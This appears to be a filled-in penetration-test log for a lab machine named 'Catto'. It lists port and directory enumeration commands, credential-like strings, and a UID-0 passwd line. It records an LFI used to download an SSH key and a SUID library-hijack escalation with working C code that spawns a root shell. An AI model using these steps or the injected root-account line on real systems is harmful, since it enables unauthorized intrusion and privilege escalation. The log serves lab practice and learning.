🧪 Pentest Log: {{date:2025-07-23}}

🔍 Target Information

• Machine Name: Catto
• IP Address: 192.168.152.139
• Operating System: Windows

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 192.168.152.139 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV 192.168.152.139 -oN tcp_scan_result.txt

nmap -sU --top-ports 100 192.168.152.139 -oN udp_scan_result.txt

Port 8080

Web Content Enumeration

gobuster dir -u http://192.168.152.139:8080 -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://192.168.152.139:8080

wpscan -url http://192.168.152.139:8080

dirsearch -u http://192.168.152.139:8080 -r -o dirsearch.txt

Port 18080

Port 30330

WallAskCharacter305

Port 32785

Port 39601

Port 42022

Port 50400

Port 8081

EscalateRaftHubris123

tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: (e.g., RCE, LFI, SQLi, etc.) LFI

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

download the id_rsa key under the deathflash's .ssh directory

🧬 Privilege Escalation

👤 Current Access

• User: deathflash
• Groups: deathflash
• Shell Type: (reverse shell / web shell / meterpreter / etc.) ssh

🔍 Enumeration

SUID Binaries:

find / -perm -4000 -type f 2>/dev/null

strings /opt/backup

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: (e.g., Sudo Misconfig, SUID Abuse, Kernel Exploit) SUID Abuse
• Target Binary/Service: Backup
• Reference / Source: (GTFOBins, ExploitDB, CVE, etc.) CVE

🔧 Exploit Steps

• create a malicious libm.c file

#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -i");
}

• compile it in the target machine

gcc -shared -fPIC -nostartfiles -o libm.so libm.c

• Smash to root

/opt/backup